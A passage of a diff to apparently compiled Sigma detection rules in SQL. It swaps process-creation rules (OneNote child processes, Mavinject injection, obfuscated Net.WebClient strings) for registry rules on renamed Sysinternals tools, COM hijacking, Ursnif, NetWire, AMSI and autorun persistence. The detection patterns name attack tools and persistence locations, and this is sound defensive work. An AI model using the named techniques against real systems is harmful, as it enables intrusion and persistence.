LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sysinternals%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" + "filename": "registry_add_pua_sysinternals_susp_execution_via_eula.yml" }, { - "title": "File Download Using Notepad++ GUP Utility", - "id": "44143844-0631-49ab-97a0-96387d6b2d7c", + "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", + "id": "f50f3c09-557d-492d-81db-9064a8d4e211", "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", + "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Other parent processes other than notepad++ using GUP that are not currently identified" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_gup_download.yml" + "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" }, { - "title": "Wab Execution From Non Default Location", - "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "title": "Potential COM Object Hijacking Via TreatAs Subkey - Registry", + "id": "9b0f8a61-91b2-464f-aceb-0527e0a45020", "status": "experimental", - "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects COM object hijacking via TreatAs subkey", + "author": "Kutepov Anton, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.persistence", + "attack.t1546.015" + ], + "falsepositives": [ + "Maybe some system utilities in rare cases use linking keys for backward compatibility" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%HKU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Classes\\\\CLSID\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\TreatAs%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')))" + ], + "filename": "registry_add_persistence_com_key_linking.yml" + }, + { + "title": "Potential Ursnif Malware Activity - Registry", + "id": "21f17060-b282-4249-ade0-589ea3591558", + "status": "test", + "description": "Detects registry keys related to Ursnif malware.", + "author": "megan201296", + "tags": [ + "attack.execution", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" + "filename": "registry_add_malware_ursnif.yml" }, { - "title": "Mavinject Inject DLL Into Running Process", - "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "title": "Potential Persistence Via New AMSI Providers - Registry", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", "status": "experimental", - "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Legitimate security products adding their own AMSI providers. Filter these according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" + "filename": "registry_add_persistence_amsi_providers.yml" }, { - "title": "Suspicious Microsoft OneNote Child Process", - "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", + "title": "Potential NetWire RAT Activity - Registry", + "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", "status": "experimental", - "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects registry keys related to NetWire RAT", + "author": "Christopher Peacock", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "File located in the AppData folder with trusted signature" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" + "filename": "registry_add_malware_netwire.yml" }, { - "title": "Suspicious Rundll32 Setupapi.dll Activity", - "id": "285b85b1-a555-4095-8652-a8a4106af63f", - "status": "test", - "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", - "author": "Konstantin Grishchenko, oscd.community", + "title": "Potential Persistence Via Disk Cleanup Handler - Registry", + "id": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", + "status": "experimental", + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.persistence" ], "falsepositives": [ - "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" + "Legitimate new entry added by windows" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND ParentCommandLine LIKE '%InstallHinfSection%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\Active Setup Temp Folders' ESCAPE '\\' OR TargetObject LIKE '%\\\\BranchCache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Content Indexer Cleaner' ESCAPE '\\' OR TargetObject LIKE '%\\\\D3D Shader Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Delivery Optimization Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Device Driver Packages' ESCAPE '\\' OR TargetObject LIKE '%\\\\Diagnostic Data Viewer database files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Downloaded Program Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\DownloadsFolder' ESCAPE '\\' OR TargetObject LIKE '%\\\\Feedback Hub Archive log files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Internet Cache Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Language Pack' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft Office Temp Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Offline Pages Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Old ChkDsk Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Previous Installations' ESCAPE '\\' OR TargetObject LIKE '%\\\\Recycle Bin' ESCAPE '\\' OR TargetObject LIKE '%\\\\RetailDemo Offline Content' ESCAPE '\\' OR TargetObject LIKE '%\\\\Setup Log Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error memory dump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error minidump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Setup Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Sync Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Thumbnail Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Update Cleanup' ESCAPE '\\' OR TargetObject LIKE '%\\\\Upgrade Discarded Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\User file versions' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Defender' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Error Reporting Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows ESD installation files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Upgrade Log Files' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_setupapi_installhinfsection.yml" + "filename": "registry_add_persistence_disk_cleanup_handler_entry.yml" }, { - "title": "Net WebClient Casing Anomalies", - "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", + "title": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification", + "id": "480421f9-417f-4d3b-9552-fd2728443ec8", "status": "experimental", - "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE 